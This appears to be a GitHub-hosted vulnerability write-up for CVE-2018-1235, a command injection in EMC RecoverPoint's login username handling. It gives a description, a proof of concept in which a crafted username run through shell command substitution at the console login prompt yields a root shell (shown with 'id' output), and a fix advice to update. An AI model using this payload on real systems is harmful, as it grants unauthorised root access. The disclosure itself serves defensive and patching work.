Skip to content

Latest commit

 

History

History
34 lines (25 loc) · 1.15 KB

EMC_RPT_CVE-2018-1235-local.md

File metadata and controls

34 lines (25 loc) · 1.15 KB

EMC RecoverPoint < 5.1.2/5.1.1.3 username command injection (local root exploit)

1. Description

An OS command injection vulnerability exists in the mechanism which processes usernames which are presented for authentication, allowing unauthenticated root access via tty console login.

2. Proof of Concept

  • Inject into local tty console login prompt
recoverpoint login: $(bash > &2)
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#

Screenshot

Local root exploit

3. Solution:

Update to latest version of RecoverPoint